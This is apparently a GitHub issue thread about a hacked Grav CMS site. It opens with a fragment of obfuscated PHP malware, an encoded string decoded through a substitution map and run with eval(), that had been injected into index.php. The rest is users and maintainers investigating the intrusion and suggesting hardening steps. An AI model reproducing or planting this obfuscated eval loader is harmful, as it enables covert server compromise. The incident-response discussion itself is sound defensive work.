'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKon_YNBvsw_gEj%I4%If6pWp%M0%IiY%Ii'.
'%Mm%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKEoAC%IK%If6pWp%M0%Iipb%Ii%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKEHsW%I4%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%K'.
'm%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKon_YNBvsw_NCp6%I4%Ir'.
'%Q0%Km%Kl%im';
$rgfsjiogsq = Array('1'=>'j', '0'=>'B', '3'=>'I', '2'=>'N', '5'=>'Z', '4'=>'8', '7'=>'H', '6'=>'d', '9'=>'y', '8'=>'W', 'A'=>'h', 'C'=>'o', 'B'=>'u', 'E'=>'e', 'D'=>'q', 'G'=>'6', 'F'=>'J', 'I'=>'2', 'H'=>'x', 'K'=>'0', 'J'=>'w', 'M'=>'5', 'L'=>'F', 'O'=>'v', 'N'=>'l', 'Q'=>'3', 'P'=>'O', 'S'=>'U', 'R'=>'Q', 'U'=>'T', 'T'=>'S', 'W'=>'t', 'V'=>'Y', 'Y'=>'p', 'X'=>'X', 'Z'=>'L', 'a'=>'f', 'c'=>'E', 'b'=>'k', 'e'=>'1', 'd'=>'K', 'g'=>'r', 'f'=>'4', 'i'=>'7', 'h'=>'b', 'k'=>'R', 'j'=>'m', 'm'=>'D', 'l'=>'A', 'o'=>'c', 'n'=>'s', 'q'=>'C', 'p'=>'a', 's'=>'i', 'r'=>'9', 'u'=>'G', 't'=>'z', 'w'=>'n', 'v'=>'g', 'y'=>'V', 'x'=>'M', 'z'=>'P');
eval/*jlfhbagwmg*/(geaunvl($edkssedkbz, $rgfsjiogsq));
}

avxkim commented 6 years ago

how to check whole node_modules dir?

rhukster commented 6 years ago

Does that directory that is reference exist on your server? is that under your Grav directory or some other place?

avxkim commented 6 years ago

Its node_modules dir, because i've already deleted all malicious injections from my files with a help of git status.

w00fz commented 6 years ago

Do you have server logs (Apache/php) ?

rhukster commented 6 years ago

But where did node_modules directory come from? what was the list of packages installed there?

Here's the thing, simply having a line in a Grav index.php file that has some malware loaded doesn't tell us much. It doesn't even mean that Grav was used to install that vulnerability. Grav is just a bunch of files, so if someone gains access to your server, it can edit any file, including one of Gravs. As this vunlerability seems to rely on a file in a node_modules folder, which is something Node.js uses, and Grav doesn't actually have any Node.js stuff in it itself, it seems unlikely it's Grav. But we need to know more about how that malware got there, which might lead us to how that Grav file was modified.

So more questions for you:

Do you have a backup of this node_modules dir before you deleted it?
Why do you have a package.json file a the root of your Grav installation? This is not part of Grav, and this is used by Node.js to install packages in a node_modules folder
Why do you have a permissions.sh file in your root?
Do you have copies of your apache access logs?
Do you have any idea when this change might have happened?

avxkim commented 6 years ago

node_modules came from package.json that i've created, it has the following lines:

  "devDependencies": {
    "gulp": "^3.9.1",
    "gulp-clean-css": "^3.9.3",
    "gulp-concat": "^2.6.1",
    "gulp-rename": "^1.2.2",
    "gulp-sass": "^3.1.0",
    "gulp-uglify": "^3.0.0"
  },
  "dependencies": {
    "@fortawesome/fontawesome-free-webfonts": "^1.0.4",
    "bootstrap": "^4.0.0"
  }

Nothing unusual, just some packages for frontend. Answering on your questions:

unfortunately i didn't backup it;
Where it supposed to be then? My own theme's dir? I just installed all packages in the root of my site;
I just uploaded it before that thing happened to me;
I have admin panel, if you mean that.

So can a node package make changes to my files, is that possible at all?

rhukster commented 6 years ago

Well, you shouldn't really ever be doing this kind of development on a live server. You should be doing these kinds of development tasks on your local machine, and only pushing the 'production' CSS and JS to your production server. (https://getgrav.org/blog/development-strategy)

So:

You should do these kinds of CSS/JS development on your local development environment, not production
These files node/gulp etc, should be in the theme, and should NOT be something you push to production

This malware vector is reliant on an ico file in a path-root-regex JS package. This is a real package, but was it installed? is it compromised? So many unknowns, and we can't really know without seeing the files (which you have deleted).

It's strange that this malware is reliant on something that's not standard in Grav, something that is based on non-standard folders, that you have installed. It seems more a vulnerability coming from that, than from Grav.

We really can't do much more until we see some logs of that show anything useful, because right now, there are no clues to indicate that anything was compromised in Grav other than the default file modified, but any malware would look for that file and install things there. So again, not really anything Grav-specific here.

OleVik commented 6 years ago

I've seen this before, and in just about every case it is a result of FTP, SFTP or SSH credentials hijacked or sniffed from insufficiently secure connections. It affecting Grav is not unique, as Grav utilizes a index.php in its root folder. The common employment of this vector is to inject strings into index.php, .htaccess, or other common files.

Apart from not developing on a live server, scrubbing the node_modules directory is entirely safe as any valid scripts relying on them currently can be rebuilt with a simple npm install on that package.json. @heihachi88, could you please also provide details filling out the report template here? Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache, Ngxinx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

From what I can tell, this has little to do with path-root-regex, and more to do with an automated execution relying on an obscure file in an obscure location. The last time I fixed an issue like this, the most evident trace of activity was revealed in Apache's logs, as an increase in automated attempts to access files that were non-standard to the related software - including Grav, WordPress, and various BB-like forums.

The patch, if I may suggest a solution based on prior experience and intuition, is to immediately revoke all FTP-accounts, SSH-accounts, and any other system-level access-credentials that have been issued. Even if you are the only person you know to have access to the server, you need to lock it down in order to secure further connections. Especially FTP is prone to this, as getting credentials is comparatively easy, but also SFTP and SSH as mentioned above. Generally, for a production server, you always use an unique (one per account and site) private/public key-pair with access token, and take care to replace this frequently.

rhukster commented 6 years ago

Good points Ole, just to be safe on the Grav side too, use a non-standard admin path (configurable in admin plugin configuration), non-standard admin account (not admin), and new password, as well as potentially enabling 2FA.

avxkim commented 6 years ago

@OleVik i am not using a password for ssh logins, just the key, i completely disabled logins via passwords long ago, that's why i'm curious, how's that even possible, i thought maybe it's a flaw in a Grav Admin plugin' form.

rhukster commented 6 years ago

Anything is possible, but without the access logs we just can' know how they got in.

avxkim commented 6 years ago

i'll create separate access log for this website and will track this

OleVik commented 6 years ago

It would also, as I mentioned above, be helpful if you could expand upon the hosting environment:

Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache, Ngxinx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

avxkim commented 6 years ago

Nothing happened yet, since i wiped whole site and cloned clean one from my repo, i just changed admin password to a very difficult one, like DsfXHJLgW4KGeDpGNiRagnFf. I guess they brute-forced admin form, or it has flaws.

My hosting environment is pretty simple:

Nginx 1.10
php-fpm 7.2
Grav v1.4.3
Admin v1.7.4

nothing more is installed here, nobody has access to it, except myself, password authentication is turned off, using key to auth, not using FTP (server) on all of my VPS since 2012 year.

OleVik commented 6 years ago

@heihachi88 Any more activity since the 22nd? The Login plugin can prevent brute-force attacks, see Rate Limiting.

h3artbl33d commented 6 years ago

Personally, I find this issue somewhat disturbing, due to the following concerns:

You are claiming that Grav is vulnerable, purely and utterly based on false assumptions.
You are refusing any and all detail that could give concrete information to help you out, despite being asked for that.
You clearly lack the knowledge to set up a secure/sane hosting environment.

These three concerns and the title of the issue you have filed are insulting to the developers, are spreading FUD and a false sense of insecurity - or to put it in the famous words: fake news.

I can help you out - but only if you are more thoughtful to those whom you are asking for help in a very blunt and disrespectful manner.

h3artbl33d commented 6 years ago

Moreover, if you would like further assist, consider the following details relevant:

What OS and software are you running, how are updates handled? Just stating nginx 1.10 doesn't help; that version stems from Q2 2016. Likely there is a subversion and perhaps backported security patches, supplied by your OS vendor.
Do you have relevant logs, going back before the malicious file was placed?
How are publicly exposed services configured? Most importantly, the webserver, php, etc. Setting ACLs says nothing if the server hosts dozens of websites, outdated and vulnerable, all running under the nginx user.
How did you configure Grav before it was hacked? You stated that you've changed the password to a very difficult one AFTER the hack, for all we know it was abc123 before that. Moreover, did you move the admin directory, enabled 2FA, etc? And did you use the nginx configuration that is supplied by Grav?
Certain things would be handy to tell beforehand, like running a development stack on a production webserver.

Personally, I would take drastic measures if a website or webserver was hacked; completely reinstalling the box and walking through the configuration to set everything as secure as possible.

andrewd72 commented 6 years ago

I think the malware disables logging? using: https://malwaredecoder.com/ @ini_set('error_log', NULL); @ini_set('log_errors', 0);

h3artbl33d commented 6 years ago

It doesn't. These two lines merely -try- to disable error logging from PHP. The ini_set should be listed in the disabled_functions directive in php.ini - especially when there is just one user to manage these websites.

Even if that is not the case, ini_set is unable to change the values of Nginx' logging facilities, like the access log, the error log (by Nginx) and other logging facilities that might be in place.

mahagr commented 6 years ago

@h3artbl33d Unfortunately ini_set() is kind of required to make Grav (or any other CMS) work properly with all the server settings.

h3artbl33d commented 6 years ago

Though I completely respect your opinion, I have to disagree. ini_set is merely a hack to change values set in php.ini.

If a server runs several websites, each with a different CMS, it doesn't matter that much. All those PHP functions combined post no greater or lesser (security) risk than allowing ini_set.

There are methods that mitigate this risk, like chrooting/jailing/caging, every website runs under its own user with its own PHP instance, etc. But few are willing to go through that effort - myself included. Even though I find that attitude lacking to best effort, I do understand that.

Back on topic, @heihachi88, are you willing to investigate as how this server was infected?

nithinkolekar commented 6 years ago

I thought it was just me and ignored assuming it was mis-configuration in hosting environment until I found this thread which sounds exactly problem i.e. malicious code injected to load favicon_cea5e6.ico

Additionally new index.php were found in user/pages/ and bin/ with malicious code mentioned by OP.

As a workaround I created empty index.php with permission set to root so that it won't be modified nor created. ( Too hackish. I know)

rhukster commented 6 years ago

Do you have logs showing how that file was modified? Also is this on shared hosting or on a dedicated server? Do other sites run on this server ? If so where any of them compromised ?

nithinkolekar commented 6 years ago

I have VPS(reputed) and taken the backup of logs of last 2 months. But I don't find any suspicious url where that file get created.

Log with changing actual domain name and username. grav-log-MayJune2018.zip

Permissions were set as per the official guidelines.

nithinkolekar commented 6 years ago

Do other sites run on this server ?

yes there are some Drupal sites.

If so where any of them compromised ?

yes(only 1), but thats long back when ownership of webroot and directorates was mistakenly set to www-data where it just files,tmp folders supposed to have that permission. After I set permission properly never get compromised. FYI : In drupal even if php is uploaded to files or tmp folder then execution of that file will be suppressed with simple .htaccess. (maybe you can borrow this trick to make assets/upload folder not php-executable?)

getgrav / grav

Major security issues #1985